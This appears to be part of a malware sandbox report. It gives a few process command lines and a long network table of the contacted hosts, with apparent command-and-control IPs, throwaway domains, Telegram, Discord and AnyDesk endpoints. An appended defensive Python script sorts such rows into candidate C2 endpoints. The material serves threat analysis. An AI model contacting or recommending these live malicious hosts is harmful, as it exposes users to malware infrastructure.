C:\Windows\SysWOW64\WerFault.exe -u -p 3352 -s 188
C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.66.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| RU | 185.215.113.209:80 | 185.215.113.209 | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gateway.discord.gg | udp |
| US | 162.159.136.234:443 | gateway.discord.gg | tcp |
| US | 8.8.8.8:53 | 234.136.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | geolocation-db.com | udp |
| DE | 159.89.102.253:443 | geolocation-db.com | tcp |
| US | 8.8.8.8:53 | 232.136.159.162.in-addr.arpa | udp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 253.102.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| FR | 194.59.30.220:1336 | | tcp |
| US | 8.8.8.8:53 | 220.30.59.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.190.18.2.in-addr.arpa | udp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 8.8.8.8:53 | 10.244.41.31.in-addr.arpa | udp |
| RU | 31.41.244.12:80 | 31.41.244.12 | tcp |
| US | 8.8.8.8:53 | 12.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| FR | 142.250.179.67:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | 238.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| FR | 142.250.179.67:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 225.74.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | r11.o.lencr.org | udp |
| GB | 88.221.135.115:80 | r11.o.lencr.org | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.33.115.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 115.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.249.124.192.in-addr.arpa | udp |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| RU | 185.215.113.16:80 | 185.215.113.16 | tcp |
| US | 8.8.8.8:53 | 16.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | grahm.xyz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.10.203.116.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | infect-crackle.cyou | udp |
| US | 8.8.8.8:53 | e5.o.lencr.org | udp |
| GB | 88.221.135.115:80 | e5.o.lencr.org | tcp |
| US | 172.67.216.167:443 | infect-crackle.cyou | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 167.216.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | fightlsoser.click | udp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 172.67.213.48:443 | fightlsoser.click | tcp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 172.67.206.64:443 | covery-mover.biz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 64.206.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.191.200.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.213.67.172.in-addr.arpa | udp |
| GB | 23.214.143.155:443 | steamcommunity.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 155.143.214.23.in-addr.arpa | udp |
| US | 66.45.226.53:7777 | 66.45.226.53 | tcp |
| RU | 83.217.204.194:80 | 83.217.204.194 | tcp |
| RU | 178.215.120.185:1723 | | tcp |
| RU | 83.217.206.117:3389 | | tcp |
| RU | 83.217.192.194:8080 | 83.217.192.194 | tcp |
| RU | 83.217.206.25:2000 | | tcp |
| RU | 213.108.16.154:111 | | tcp |
| RU | 89.169.1.216:443 | | tcp |
| RU | 178.215.75.170:80 | | tcp |
| RU | 178.215.74.17:23 | | tcp |
| RU | 83.217.192.194:8080 | | tcp |
| RU | 83.217.219.114:465 | | tcp |
| RU | 89.169.20.205:49155 | | tcp |
| RU | 178.215.74.228:8011 | | tcp |
| RU | 83.217.197.147:22 | | tcp |
| RU | 89.169.1.199:22 | | tcp |
| RU | 89.169.41.215:443 | | tcp |
| RU | 83.217.192.194:8080 | | tcp |
| RU | 89.169.0.114:8292 | | tcp |
| RU | 89.169.22.207:8080 | | tcp |
| RU | 178.215.90.34:80 | | tcp |
| RU | 213.108.19.30:445 | | tcp |
| US | 8.8.8.8:53 | 53.226.45.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.204.217.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.75.215.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.197.217.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.74.215.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.19.108.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.192.217.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | peerhost59mj7i6macla65r.com | udp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| NL | 94.154.172.218:443 | peerhost59mj7i6macla65r.com | tcp |
| US | 8.8.8.8:53 | 218.172.154.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.90.215.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ikswccmqsqeswegi.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| N/A | 127.0.0.1:8080 | | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| DE | 101.99.92.189:8080 | | tcp |
| US | 8.8.8.8:53 | 189.92.99.101.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sanboxland.pro | udp |
| GB | 89.35.131.209:80 | sanboxland.pro | tcp |
| US | 8.8.8.8:53 | 209.131.35.89.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | grahm.xyz | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | drive-connect.cyou | udp |
| US | 172.67.139.78:443 | drive-connect.cyou | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | zinc-sneark.biz | udp |
| US | 8.8.8.8:53 | dwell-exclaim.biz | udp |
| US | 8.8.8.8:53 | formy-spill.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | dare-curbys.biz | udp |
| US | 8.8.8.8:53 | print-vexer.biz | udp |
| US | 8.8.8.8:53 | 78.139.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.58.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | impend-differ.biz | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.123.95.227:443 | steamcommunity.com | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | 227.95.123.104.in-addr.arpa | udp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| US | 8.8.8.8:53 | a1060630.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1060630.xsph.ru | tcp |
| US | 8.8.8.8:53 | 138.192.8.141.in-addr.arpa | udp |
| FR | 142.250.75.238:443 | drive.google.com | tcp |
| FR | 142.250.74.225:443 | drive.usercontent.google.com | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | f0706909.xsph.ru | udp |
| RU | 141.8.193.236:80 | f0706909.xsph.ru | tcp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 8.8.8.8:53 | 236.193.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.57.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:64295 | | tcp |
| N/A | 127.0.0.1:64433 | | tcp |
| DE | 185.220.101.195:443 | | tcp |
| US | 8.8.8.8:53 | 195.101.220.185.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| FR | 62.210.131.119:9001 | | tcp |
| DE | 51.89.106.29:8080 | | tcp |
| US | 8.8.8.8:53 | 119.131.210.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.106.89.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a1059592.xsph.ru | udp |
| RU | 141.8.192.138:80 | a1059592.xsph.ru | tcp |
| FR | 94.23.121.150:9001 | | tcp |
| US | 8.8.8.8:53 | f1043947.xsph.ru | udp |
| RU | 141.8.192.151:80 | f1043947.xsph.ru | tcp |
| US | 8.8.8.8:53 | 150.121.23.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a1051707.xsph.ru | udp |
| RU | 141.8.192.217:80 | a1051707.xsph.ru | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | freegeoip.app | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 172.67.160.84:443 | freegeoip.app | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | ipbase.com | udp |
| FR | 142.250.75.227:443 | gstatic.com | tcp |
| US | 172.67.209.71:443 | ipbase.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 217.192.8.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.160.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.75.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.209.67.172.in-addr.arpa | udp |
| US | 154.216.17.90:80 | | tcp |
| RU | 176.113.115.19:80 | 176.113.115.19 | tcp |
| US | 8.8.8.8:53 | 19.115.113.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.speak-a-message.com | udp |
| DE | 195.201.119.163:80 | www.speak-a-message.com | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 163.119.201.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | awake-weaves.cyou | udp |
| US | 8.8.8.8:53 | ipwho.is | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 172.67.143.116:443 | awake-weaves.cyou | tcp |
| DE | 195.201.57.90:80 | ipwho.is | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | jrqh-hk.com | udp |
| CN | 123.136.92.99:80 | jrqh-hk.com | tcp |
| US | 8.8.8.8:53 | immureprech.biz | udp |
| US | 172.67.207.38:443 | immureprech.biz | tcp |
| US | 8.8.8.8:53 | 116.143.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | deafeninggeh.biz | udp |
| US | 104.21.16.1:443 | deafeninggeh.biz | tcp |
| US | 8.8.8.8:53 | effecterectz.xyz | udp |
| US | 8.8.8.8:53 | diffuculttan.xyz | udp |
| US | 8.8.8.8:53 | debonairnukk.xyz | udp |
| US | 8.8.8.8:53 | wrathful-jammy.cyou | udp |
| US | 104.21.74.196:443 | wrathful-jammy.cyou | tcp |
| US | 8.8.8.8:53 | 38.207.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.92.136.123.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.16.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.74.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sordid-snaked.cyou | udp |
| US | 172.67.141.195:443 | sordid-snaked.cyou | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| FR | 23.217.238.254:443 | steamcommunity.com | tcp |
| US | 8.8.8.8:53 | 195.141.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.238.217.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 20.83.148.22:8080 | 20.83.148.22 | tcp |
| US | 8.8.8.8:53 | 22.148.83.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | updates.signiant.com | udp |
| DE | 13.32.121.112:80 | updates.signiant.com | tcp |
| US | 8.8.8.8:53 | 112.121.32.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | www.hootech.com | udp |
| US | 107.191.125.184:80 | www.hootech.com | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | portals.mediashuttle.com | udp |
| US | 76.223.25.251:443 | portals.mediashuttle.com | tcp |
| US | 8.8.8.8:53 | 184.125.191.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 154.216.17.90:80 | | tcp |
| US | 8.8.8.8:53 | 251.25.223.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aukuqiksseyscgie.xyz | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ship-amongst.gl.at.ply.gg | udp |
| US | 147.185.221.24:14429 | ship-amongst.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 24.221.185.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| RU | 31.41.244.10:80 | 31.41.244.10 | tcp |
| US | 76.223.25.251:443 | portals.mediashuttle.com | tcp |
| US | 76.223.25.251:443 | portals.mediashuttle.com | tcp |
| US | 76.223.25.251:443 | portals.mediashuttle.com | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | webcdn.triongames.com | udp |
| GB | 2.19.117.97:80 | webcdn.triongames.com | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 8.8.8.8:53 | 97.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.68.81.185.in-addr.arpa | udp |
| DE | 87.120.84.32:80 | 87.120.84.32 | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| BG | 195.230.23.72:8085 | 195.230.23.72 | tcp |
| US | 8.8.8.8:53 | 32.84.120.87.in-addr.arpa | udp |
| RU | 185.81.68.147:1912 | | tcp |
| US | 8.8.8.8:53 | 72.23.230.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | get.geojs.io | udp |
| US | 172.67.70.233:443 | get.geojs.io | tcp |
| RU | 185.215.113.43:80 | 185.215.113.43 | tcp |
| US | 8.8.8.8:53 | 233.70.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.113.215.185.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| DE | 94.156.177.133:7000 | | tcp |
| US | 154.216.17.90:80 | | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 133.177.156.94.in-addr.arpa | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 8.8.8.8:53 | boot-01.net.anydesk.com | udp |
| DE | 195.181.174.173:443 | boot-01.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-ad195ac5.net.anydesk.com | udp |
| GB | 57.128.141.163:80 | relay-ad195ac5.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 173.174.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.141.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| DE | 18.245.86.26:80 | api.playanext.com | tcp |
| US | 8.8.8.8:53 | 26.86.245.18.in-addr.arpa | udp |
| BG | 195.230.23.72:80 | | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 20.83.148.22:80 | | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| TH | 165.154.184.75:80 | 165.154.184.75 | tcp |
| US | 8.8.8.8:53 | boot.net.anydesk.com | udp |
| US | 8.8.8.8:53 | 75.184.154.165.in-addr.arpa | udp |
| DE | 57.129.37.75:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-79bdf984.net.anydesk.com | udp |
| GB | 195.181.165.153:443 | relay-79bdf984.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 75.37.129.57.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 8.8.8.8:53 | 153.165.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.102.255.239.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| FR | 142.250.75.227:443 | gstatic.com | tcp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| TH | 165.154.184.75:80 | 165.154.184.75 | tcp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 8.8.8.8:53 | camp.zapto.org | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 8.8.8.8:53 | www.grupodulcemar.pe | udp |
| PE | 161.132.57.101:443 | www.grupodulcemar.pe | tcp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| US | 8.8.8.8:53 | 101.57.132.161.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | | udp |
| N/A | 239.255.102.18:50002 | | udp |
| N/A | 239.255.102.18:50003 | | udp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| HK | 47.244.167.171:801 | | tcp |
| US | 8.8.8.8:53 | 171.167.244.47.in-addr.arpa | udp |
| US | 185.200.191.124:443 | aukuqiksseyscgie.xyz | tcp |
| US | 20.83.148.22:80 | | tcp |
| US | 192.210.150.26:3678 | | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 192.210.150.26:3678 | | tcp |
| US | 192.210.150.26:3678 | | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 192.210.150.26:3678 | | tcp |
| BG | 195.230.23.72:80 | | tcp |
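Reading the table above by hand is slow: most rows are resolver traffic to 8.8.8.8, the PTR lookups the sandbox issues for every new peer, loopback sockets and SSDP-style multicast, and the few rows that matter are spread across hundreds of lines. The script below is an added example and not part of the report or of any vendor tooling. It parses rows in this table's layout (including rows where the protocol sits in the domain column because the domain cell is empty), buckets each row, and returns the unique candidate C2 endpoints together with the domains that were resolved but never contacted, which is a useful signal when a sample carries a fallback C2 list. The bucket names and the two allow-lists of IP-geolocation and public-hosting domains are my assumptions; the sample rows are an excerpt copied from the table.

```python
"""Triage a sandbox network table of `| CC | ip:port | domain | proto |` rows."""
import ipaddress
from collections import Counter

# Excerpt of rows in the page's table layout (copied from the report above,
# deliberately including rows whose protocol sits in the domain column).
SAMPLE_ROWS = """\
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| DE | 116.203.10.31:443 | grahm.xyz | tcp |
| N/A | 127.0.0.1:8080 | tcp | |
| US | 8.8.8.8:53 | se-blurry.biz | udp |
| US | 8.8.8.8:53 | covery-mover.biz | udp |
| US | 104.21.58.186:443 | covery-mover.biz | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 192.210.150.26:3678 | tcp | |
| BG | 195.230.23.72:80 | tcp |
"""

# Assumed allow-lists: geolocation APIs (common stealer recon) and public
# services that are not C2 themselves but are often used as dead drops or
# exfiltration channels. Review these separately instead of as C2.
GEO_CHECK = {"ip-api.com", "ipinfo.io", "ipwho.is", "freegeoip.app",
             "ipbase.com", "get.geojs.io"}
PUBLIC_SERVICE = {"api.telegram.org", "t.me", "pastebin.com", "github.com",
                  "raw.githubusercontent.com", "objects.githubusercontent.com",
                  "drive.google.com", "drive.usercontent.google.com",
                  "steamcommunity.com"}


def parse_row(line):
    """Return a record for one table row, or None for non-row lines."""
    line = line.strip()
    if not line.startswith("|"):
        return None
    cells = [c.strip() for c in line.strip("|").split("|")]
    cells += [""] * (4 - len(cells))            # pad rows with a missing cell
    cc, dst, domain, proto = cells[:4]
    if domain in ("tcp", "udp") and not proto:  # protocol shifted left
        domain, proto = "", domain
    host, _, port = dst.rpartition(":")
    if not host or not port.isdigit():
        return None
    return {"cc": cc, "ip": host, "port": int(port),
            "domain": domain or None, "proto": proto}


def classify(rec):
    """Bucket a record so noise does not crowd the C2 candidate list."""
    ip = ipaddress.ip_address(rec["ip"])
    dom = rec["domain"] or ""
    if ip.is_loopback:
        return "loopback"
    if ip.is_multicast:
        return "multicast"
    if rec["port"] == 53 and rec["proto"] == "udp":
        return "ptr_lookup" if dom.endswith(".in-addr.arpa") else "dns_query"
    if dom in GEO_CHECK:
        return "geo_check"
    if dom in PUBLIC_SERVICE:
        return "public_service"
    return "candidate_c2"


def triage(text):
    """Summarise a table: bucket counts, unique C2 candidates, resolved-only domains."""
    counts, queried, connected, candidates = Counter(), set(), set(), {}
    for rec in filter(None, map(parse_row, text.splitlines())):
        cat = classify(rec)
        counts[cat] += 1
        if cat == "dns_query":
            queried.add(rec["domain"])
        elif cat not in ("ptr_lookup", "loopback", "multicast") and rec["domain"]:
            connected.add(rec["domain"])
        if cat == "candidate_c2":
            key = f'{rec["ip"]}:{rec["port"]}'
            entry = candidates.setdefault(key, {"domain": rec["domain"],
                                                "cc": rec["cc"], "hits": 0})
            entry["hits"] += 1
    return {"counts": counts, "candidates": candidates,
            "queried_only": sorted(queried - connected)}


if __name__ == "__main__":
    result = triage(SAMPLE_ROWS)
    print(dict(result["counts"]))
    for endpoint, info in result["candidates"].items():
        print(f'{endpoint:24} {info["cc"]:3} {info["domain"] or "-"} x{info["hits"]}')
    print("resolved but never contacted:", result["queried_only"])
```

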